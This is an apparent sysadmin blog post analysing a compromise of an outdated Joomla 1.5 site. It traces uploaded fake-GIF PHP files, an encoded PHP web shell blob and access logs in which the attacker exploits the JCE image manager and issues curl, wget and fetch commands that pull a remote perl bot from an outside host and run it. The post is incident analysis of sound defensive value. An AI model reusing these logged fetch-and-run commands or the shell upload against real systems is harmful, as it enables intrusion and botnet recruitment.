Being a Linux admin running multiple web servers always forcibly puts me in the game hackers vs. systems. It's an endless game without any winners.
“How art thou out of breath when thou hast breath To say to me that thou art out of breath?”
- William Shakespeare
That's definitely a quote which fits such situations. I also have to say that in the past, 99% of all hacks I've had to handle were because of old and unpatched public Content Management Systems, especially old Joomla's. While the end user (who's actually responsible for installing and maintaining the application) mostly doesn't give a damn about updates, it's the sys admin who does the work at the end.
This particular hack occurred a few weeks ago on a web server when I received an alert about the server's load. I also checked the network traffic and the graphs confirmed a great anomaly:
After a few minutes I found the responsible website (thanks to Apache server-status and lsof) which was being attacked and found several files recently modified/uploaded in one of the websites subfolders through the CMS:
ls -ltr | tail
-rw-r--r-- 1 www-data www-data 182880 Mar 9 2013 red_power.jpg
-rw-r--r-- 1 www-data www-data 299881 Mar 9 2013 strandstrukturen.jpg
-rw-r--r-- 1 www-data www-data 185763 Mar 9 2013 nuts_verflssigt.jpg
-rw-r--r-- 1 www-data www-data 1515 Dec 14 22:12 localhost.php
-rw-r--r-- 1 www-data www-data 1515 Dec 14 22:12 iam.gif
-rw-r--r-- 1 www-data www-data 1520 Dec 19 20:08 bkht.gif
-rw-r--r-- 1 www-data www-data 1635 Jan 20 10:29 viar.gif
-rw-r--r-- 1 www-data www-data 207194 Jan 29 03:35 v.php
-rw-r--r-- 1 www-data www-data 1521 Jan 29 07:07 food.php
-rw-r--r-- 1 www-data www-data 1521 Jan 29 07:07 food.gif
Let's take a look at food.gif - which is supposed to be a binary file by the way:
cat food.gif
GIF89aGlobex
[...]
Yeah that's what I actually expected to find. It's a "fake" gif which just starts with the GIF header. But because the web server doesn't execute PHP code from a file without a php file extension, this won't harm the system that much. More interesting was food.php, which looks like this:
cat food.php
GIF89aGlobex
JQdLfz1WnQgp84AySJACaggwfY1YlSSWgy6lx68TbSqLIhFMUOARF3JyiEyUrFgN+3koTo67NC0yuqmNqmTBSm0Xh5KHJK/s+z3YahDZsWq4iZROg3mIosoNLxNyrN1elpikTt6Ug9X8QgmjMpdWU85sznkZHbR+Sc2MdBkTNU3tsGIYWcC/SeN54iutZn5j0V5SZMXm1vuArINLi495Ou/3v9VsBJvjAyV2nnXdNcmGgwNM6+jYLLloBWLQu7ZekbEbzzk3C7ayHhnHWl+uzsBBy+J1fHc44PR1FWkh4waOYbyGEu8O7KyRncNPPrDYUnRMjAb+iy6mKHDnBltqiSawdncwPyQUSev2VTMVY1CyDPfCE2TLmHnooypamdbEgCj4Mhwsr4MzTw/Jkz16z1Wuh75uGc6IpaxJFpm9teq1SSq2Pk6/NhO0Yj+wrDXu+Zh9c6mPkexJZlDUTl+6sU0279JvBU7WGEmK74UgvwmDmjQQ1AQAYLNve7OAN9wsGi6aoANfa5/wdqUSPOT2XmE3AMFm/a8E+Q7UXq7JXp5rLwL/Dw==')))); ?>
The content of food.php is actually the same as food.gif. As hackers often do, they encode the whole PHP source code. By decoding the whole stuff, the following source code is revealed:
Well this does look like a small PHP shell script. Let's look at it in the browser:
Cute :-).
The steps that followed were causing the huge load.
The hacker not just simply executed some commands. No. The hacker used a method to download a remote perl script and then execute this perl script from this form:
27.111.90.4 - - [29/Jan/2014:07:07:51 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:07:51 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 200 50 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:07:55 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:07:54 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 200 50 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:08:08 +0100] "GET /images/stories/food.php?rf HTTP/1.1" 200 2455 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:10 +0100] "GET /images/stories/food.php?cmd=curl+-C+-+-O+http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:11 +0100] "GET /images/stories/food.php?cmd=wget++http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:12 +0100] "GET /images/stories/food.php?cmd=fetch++http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:13 +0100] "GET /images/stories/food.php?cmd=lwp-download++http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
I manually accessed the URL where the perl bot was downloaded from and this is how the bot script looked like:
On the system, several hundred processes called "/usr/sbin/httpd" were launched (obviously the process name was faked) which were launching the perl bot. Each instance of the bot attacked several websites on the Internet, trying to do the same exact again: Find Joomla vulnerability and hack the website.
Once I disabled the hacked site, it was calm again. And once again, the responsible website was running this:
var $RELEASE = '1.5';
/** @var string Development Status */
var $DEV_STATUS = 'Stable';
/** @var int Sub Release Level */
var $DEV_LEVEL = '15';
/** @var int build Number */
var $BUILD = '';
/** @var string Codename */
var $CODENAME = 'Wojmamni Ama Mamni';
/** @var string Date */
var $RELDATE = '05-November-2009';
Honestly, I can't blame the hackers. There are so many pseudo-webmasters out there installing once a CMS and then not taking care about it anymore, it's just too easy to commit a hack.
No comments yet.
AWS Android Ansible Apache Apple Atlassian BSD Backup Bash Bluecoat CMS Chef Cloud Coding Consul Containers CouchDB DB DNS Database Databases Docker ELK Elasticsearch Filebeat FreeBSD Galera Git GlusterFS Grafana Graphics HAProxy HTML Hacks Hardware Icinga Influx Internet Java KVM Kibana Kodi Kubernetes LVM LXC Linux Logstash Mac Macintosh Mail MariaDB Minio MongoDB Monitoring Multimedia MySQL NFS Nagios Network Nginx OSSEC OTRS Office OpenSearch PGSQL PHP Perl Personal PostgreSQL Postgres PowerDNS Proxmox Proxy Python Rancher Rant Redis Roundcube SSL Samba Seafile Security Shell SmartOS Solaris Surveillance Systemd TLS Tomcat Ubuntu Unix VMWare VMware Varnish Virtualization Windows Wireless Wordpress Wyse ZFS Zoneminder